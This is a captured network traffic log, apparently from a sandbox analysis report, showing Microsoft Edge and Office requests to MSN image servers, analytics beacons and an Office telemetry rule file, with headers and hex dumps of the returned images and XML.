                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        2024-11-20 23:49:44 UTC516INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Last-Modified: Mon, 11 Nov 2024 13:51:58 GMT
                                                                                                                                                                                                                                                        X-Datacenter: northeu
                                                                                                                                                                                                                                                        X-ActivityId: 03b090a8-ff0d-477a-9433-19affde5f1c7
                                                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                                                                                        X-ResizerVersion: 1.0
                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        Content-Location: https://img.s-msn.com/tenant/amp/entityid/AAc9vHK
                                                                                                                                                                                                                                                        X-Source-Length: 1218
                                                                                                                                                                                                                                                        Content-Length: 1218
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=396410
                                                                                                                                                                                                                                                        Expires: Mon, 25 Nov 2024 13:56:33 GMT
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:43 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-11-20 23:49:44 UTC1218INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 71 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 35 2d 63 30 31 34 20 37 39 2e 31 35 31 34 38 31 2c 20 32 30 31 33 2f 30 33 2f 31 33 2d 31 32 3a 30 39 3a 31 35 20 20
                                                                                                                                                                                                                                                        Data Ascii: PNGIHDR szztEXtSoftwareAdobe ImageReadyqe<qiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        76192.168.2.54985923.57.90.1014437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC634OUTGET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1
                                                                                                                                                                                                                                                        Host: img-s-msn-com.akamaized.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        2024-11-20 23:49:44 UTC516INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Last-Modified: Sun, 10 Nov 2024 06:13:55 GMT
                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1lFz6G
                                                                                                                                                                                                                                                        X-Source-Length: 5699
                                                                                                                                                                                                                                                        X-Datacenter: eastus
                                                                                                                                                                                                                                                        X-ActivityId: bc29e663-afdb-4755-98a8-93c38517b841
                                                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                                                                                        X-ResizerVersion: 1.0
                                                                                                                                                                                                                                                        Content-Length: 5699
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=282234
                                                                                                                                                                                                                                                        Expires: Sun, 24 Nov 2024 06:13:38 GMT
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:44 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-11-20 23:49:44 UTC5699INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 32 08 06 00 00 00 1e 3f 88 b1 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 84 65 58 49 66 4d 4d 00 2a 00 00 00 08 00 05 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 4a 01 1b 00 05 00 00 00 01 00 00 00 52 01 28 00 03 00 00 00 01 00 02 00 00 87 69 00 04 00 00 00 01 00 00 00 5a 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 03 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00 04 00 00 00 01 00 00 00 32 a0 03 00 04 00 00 00 01 00 00 00 32 00 00 00 00 86 f1 c2 a8 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00
                                                                                                                                                                                                                                                        Data Ascii: PNGIHDR22?gAMAa cHRMz&u0`:pQ<eXIfMM*JR(iZHH22pHYs


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        77192.168.2.54986023.57.90.1014437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC634OUTGET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1
                                                                                                                                                                                                                                                        Host: img-s-msn-com.akamaized.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        2024-11-20 23:49:44 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Last-Modified: Sun, 17 Nov 2024 01:27:23 GMT
                                                                                                                                                                                                                                                        X-Datacenter: westus
                                                                                                                                                                                                                                                        X-ActivityId: 9e7c39fd-58db-4e2c-957a-f382c8e91634
                                                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                        X-ResizerVersion: 1.0
                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA1hk7Sh
                                                                                                                                                                                                                                                        X-Source-Length: 6962
                                                                                                                                                                                                                                                        Content-Length: 6962
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=92211
                                                                                                                                                                                                                                                        Expires: Fri, 22 Nov 2024 01:26:35 GMT
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:44 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-11-20 23:49:44 UTC6962INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 32 08 06 00 00 00 1e 3f 88 b1 00 00 0c 3f 69 43 43 50 49 43 43 20 50 72 6f 66 69 6c 65 00 00 48 89 95 57 07 58 53 c9 16 9e 5b 92 90 90 84 12 40 40 4a e8 4d 10 a9 01 a4 84 d0 42 ef 08 36 42 12 20 94 18 03 41 c5 8e 2e 2a b8 76 b1 80 0d 5d 15 51 b0 02 62 47 ec 2c 8a bd 2f 16 54 94 75 b1 60 57 de a4 80 ae fb ca f7 e6 fb e6 ce 7f ff 39 f3 9f 33 e7 ce dc 7b 07 00 8d e3 3c 89 24 0f d5 04 20 5f 5c 28 8d 0f 0d 64 8e 4a 4d 63 92 9e 02 0c d0 01 15 38 01 4b 1e bf 40 c2 8e 8d 8d 04 b0 0c b4 7f 2f ef ae 03 44 de 5e 71 94 6b fd b3 ff bf 16 2d 81 b0 80 0f 00 12 0b 71 86 a0 80 9f 0f f1 7e 00 f0 2a be 44 5a 08 00 51 ce 5b 4c 2a 94 c8 31 ac 40 47 0a 03 84 78 be 1c 67 29 71 95 1c 67 28 f1 6e 85 4d 62 3c 07
                                                                                                                                                                                                                                                        Data Ascii: PNGIHDR22??iCCPICC ProfileHWXS[@@JMB6B A.*v]QbG,/Tu`W93{<$ _\(dJMc8K@/D^qk-q~*DZQ[L*1@Gxg)qg(nMb<


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        78192.168.2.54986323.57.90.1014437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC634OUTGET /tenant/amp/entityid/AA1u24yb.img HTTP/1.1
                                                                                                                                                                                                                                                        Host: img-s-msn-com.akamaized.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        2024-11-20 23:49:44 UTC516INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA1u24yb
                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 21:15:54 GMT
                                                                                                                                                                                                                                                        X-Source-Length: 3765
                                                                                                                                                                                                                                                        X-Datacenter: westus
                                                                                                                                                                                                                                                        X-ActivityId: f3e4c9dc-fa16-4ee6-89a5-1e9169e1c90d
                                                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                        X-ResizerVersion: 1.0
                                                                                                                                                                                                                                                        Content-Length: 3765
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=379681
                                                                                                                                                                                                                                                        Expires: Mon, 25 Nov 2024 09:17:45 GMT
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:44 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-11-20 23:49:44 UTC3765INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 32 08 06 00 00 00 1e 3f 88 b1 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c1 00 00 0e c1 01 b8 91 6b ed 00 00 01 87 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 27 ef bb bf 27 20 69 64 3d 27 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 27 3f 3e 0d 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 3e 3c 72 64 66 3a 52 44 46 20 78 6d 6c 6e 73 3a 72 64 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 30 32 2f 32 32 2d 72 64 66 2d 73 79 6e 74 61 78 2d 6e 73 23 22
                                                                                                                                                                                                                                                        Data Ascii: PNGIHDR22?gAMAapHYskiTXtXML:com.adobe.xmp<?xpacket begin='' id='W5M0MpCehiHzreSzNTczkc9d'?><x:xmpmeta xmlns:x="adobe:ns:meta/"><rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        79192.168.2.54985813.226.94.64437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC1012OUTGET /b2?rn=1732146580940&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=02AF36CE75CE647F00F523F374AC6592&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                        Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        Cookie: UID=1C70541621bece877abc00a1732146581; XID=1C70541621bece877abc00a1732146581
                                                                                                                                                                                                                                                        2024-11-20 23:49:44 UTC327INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:44 GMT
                                                                                                                                                                                                                                                        Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                        X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                        Via: 1.1 be0c2da195113bc0385ed0faca92ed64.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                        X-Amz-Cf-Pop: JFK52-P10
                                                                                                                                                                                                                                                        X-Amz-Cf-Id: ERAr_mqrHLX4mvbOBokv0JHPVci6VZTBHIKZkTPtZp1RkBMazejeNA==


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        80192.168.2.54986420.110.205.1194437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:44 UTC1261OUTGET /c.gif?rnd=1732146580940&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=2be22f69e21a49cfaf6226b272c6f5bf&activityId=2be22f69e21a49cfaf6226b272c6f5bf&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=98AF16FA7EF64DBE97659D03ACE375C9&MUID=02AF36CE75CE647F00F523F374AC6592 HTTP/1.1
                                                                                                                                                                                                                                                        Host: c.msn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        Cookie: USRLOC=; MUID=02AF36CE75CE647F00F523F374AC6592; _EDGE_S=F=1&SID=14C32D7CE61E6B5920983841E71A6A76; _EDGE_V=1; SM=T
                                                                                                                                                                                                                                                        2024-11-20 23:49:45 UTC983INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Content-Type: image/gif
                                                                                                                                                                                                                                                        Last-Modified: Wed, 16 Oct 2024 16:24:13 GMT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        ETag: "8d3dafd6e71fdb1:0"
                                                                                                                                                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                        P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                        Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                        Set-Cookie: MUID=02AF36CE75CE647F00F523F374AC6592; domain=.msn.com; expires=Mon, 15-Dec-2025 23:49:44 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                        Set-Cookie: SRM_M=02AF36CE75CE647F00F523F374AC6592; domain=c.msn.com; expires=Mon, 15-Dec-2025 23:49:44 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                        Set-Cookie: MR=0; domain=c.msn.com; expires=Wed, 27-Nov-2024 23:49:44 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                        Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Wed, 20-Nov-2024 23:59:44 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:44 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Content-Length: 42
                                                                                                                                                                                                                                                        2024-11-20 23:49:45 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                        Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        81192.168.2.54986513.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:44 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:45 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 425
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                                                                                        x-ms-request-id: 62f36519-501e-0016-468c-3a181b000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234945Z-1777c6cb754lv4cqhC1TEB13us0000000a9g00000000ds4k
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:45 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        82192.168.2.54987013.107.246.404437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:45 UTC425OUTGET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1
                                                                                                                                                                                                                                                        Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        2024-11-20 23:49:45 UTC543INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:45 GMT
                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        Content-Length: 1154
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Last-Modified: Wed, 25 Oct 2023 19:48:30 GMT
                                                                                                                                                                                                                                                        ETag: 0x8DBD5935D5B3965
                                                                                                                                                                                                                                                        x-ms-request-id: ef5a3f56-e01e-0029-4f75-3b1e45000000
                                                                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234945Z-178bfbc474bq2pr7hC1NYCkfgg00000000rg000000012hh1
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 69316365
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
